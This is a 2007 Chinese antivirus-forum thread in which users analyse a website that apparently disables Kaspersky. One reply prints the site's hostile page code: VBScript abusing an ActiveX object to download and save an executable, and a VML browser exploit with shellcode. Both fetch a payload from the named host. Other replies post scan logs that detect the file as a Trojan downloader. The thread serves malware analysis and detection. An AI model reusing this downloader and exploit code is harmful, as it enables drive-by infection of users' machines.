查看: 3904|回复: 15
收起左侧

[病毒样本] 针对卡巴 漏洞的网站

[复制链接]
tonger2003
发表于 2007-4-12 12:15:49 | 显示全部楼层 |阅读模式
www.17173-map.com/hh/41/index.htm   卡巴交流区看到的

这个网站打开后就显示 无法显示 是正常的 然后卡巴就突然失效~~

是没有修改时间的情况下  不知又是什么原理~~~

大家可以去提取后分析下~~~

[ 本帖最后由 tonger2003 于 2007-4-12 12:58 编辑 ]
小邪邪
发表于 2007-4-12 12:29:13 | 显示全部楼层
进去之后感觉到有点卡,觉得是有问题
但仔细查找又没发现什么,咖啡也没有动静
无瑕
发表于 2007-4-12 12:31:18 | 显示全部楼层
????

评分

参与人数 1经验 -1 收起 理由
ALEXBLAIR -1 不适宜帖

查看全部评分

龙井茶
发表于 2007-4-12 12:43:21 | 显示全部楼层
进去了,红伞报两个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
龙井茶
发表于 2007-4-12 12:43:40 | 显示全部楼层
网页无法显示
zxkf
发表于 2007-4-12 13:33:23 | 显示全部楼层
样本到~

htp://www.17173-map.com/yycx/ahd41d.exe
卡巴真的失效了?杀不出是吧?

[ 本帖最后由 zxkf 于 2007-4-12 13:37 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
icka
发表于 2007-4-12 13:38:45 | 显示全部楼层
  1. on error resume next
  2.     Set df = document.createElement("object")
  3.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  4.     str="Microsoft.XMLHTTP"
  5.     Set x = df.CreateObject(str,"")
  6.     a1="Ado"
  7.     a2="db."
  8.     a3="Str"
  9.     a4="eam"
  10.     str1=a1&a2&a3&a4
  11.     str5=str1
  12.     set S = df.createobject(str5,"")
  13.     S.type = 1
  14.     str6="GET"
  15.     x.Open str6, "http://www.17173-map.com/yycx/ahd41d.exe", False
  16.     x.Send
  17.     fsssname1="c:\\wing.exe"
  18.     set F = df.createobject("Scripting.FileSystemObject","")
  19.     set tmp = F.GetSpecialFolder(2)
  20.     S.open
  21.     S.write x.responseBody
  22.     S.savetofile fsssname1,2
  23.     S.close
  24.     set Q = df.createobject("Shell.Application","")
  25.     </script>
  26. <html>
  27. <script language="VBScript">
  28.     on error resume next
  29.     Set df = document.createElement("object")
  30.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  31.     str="Microsoft.XMLHTTP"
  32.     Set x = df.CreateObject(str,"")
  33.     a1="Ado"
  34.     a2="db."
  35.     a3="Str"
  36.     a4="eam"
  37.     str1=a1&a2&a3&a4
  38.     str5=str1
  39.     set S = df.createobject(str5,"")
  40. if Not Err.Number = 0 then
  41. err.clear
  42. document.write ("<iframe src=704.html width=0 height=0 >")
  43. else
  44.     S.type = 1
  45.     str6="GET"
  46.     x.Open str6, "http://www.17173-map.com/hh/41/yt.vbs", False
  47.     x.Send
  48.     fsssname1="yt.vbs"
  49.     set F = df.createobject("Scripting.FileSystemObject","")
复制代码


  1. <!--  vml'exploit!  -->
  2. <html xmlns:v="urn:schemas-microsoft-com:vml">
  3. <head>
  4. <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
  5. </object>
  6. <style>
  7. v\:* { behavior: url(#VMLRender); }
  8. </style>
  9. </head>
  10. <body>
  11. <script language="javascript">
  12. var shellcode = unescape("%u9090"+"%u9090"+
  13. "%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
  14. "%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
  15. "%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
  16. "%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
  17. "%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
  18. "%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
  19. "%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
  20. "%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
  21. "%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
  22. "%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
  23. "%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
  24. "%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
  25. "%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
  26. "%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
  27. "%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
  28. "%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
  29. "%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
  30. "%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
  31. "%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
  32. "%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
  33. "%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
  34. "%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
  35. "%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
  36. "%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
  37. "%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u3731%u3731" +
  38. "%u2d33%u616d%u2e70%u6f63%u2f6d%u7979%u7863%u612f" +
  39. "%u6468%u3134%u2e64%u7865%u0065");
  40. bigblock = unescape("%u0505%u0505");
  41. headersize = 20;
复制代码


尾部加的是:

  1. &Yacute;f‹ K‹Z&Yacute;‹‹&Aring;^]&Acirc;ó&thorn;&yuml;&yuml;URLMONttp://www.17173-map.com/yycx/ahd41d.exe
复制代码

[ 本帖最后由 icka 于 2007-4-12 13:42 编辑 ]
mofunzone
发表于 2007-4-12 14:00:36 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\ahd41d.rar'
C:\Documents and Settings\morgan\My Documents\
  ahd41d.rar
    [0] Archive type: RAR
    --> ahd41d.exe
        [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
beat2
发表于 2007-4-12 14:44:30 | 显示全部楼层
完整的样本 3个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-4-12 14:45:49 | 显示全部楼层

nod32启发式继续报

Scan performed at: 2007-4-12 14:45:47
Scanning Log
NOD32 version 2182 (20070411) NT
Command line: C:\Documents and Settings\EQ2\桌面\ahd41d.rar
Operating memory - is OK

Date: 12.4.2007  Time: 14:45:51
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\ahd41d.rar
C:\Documents and Settings\EQ2\桌面\ahd41d.rar ?RAR ?ahd41d.exe - probably unknown NewHeur_PE virus [7]
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 14:45:51 Total scanning time: 0 sec (00:00:00)

Notes:
[7] File is probably infected with an unknown virus.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-11 10:50 , Processed in 0.121964 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表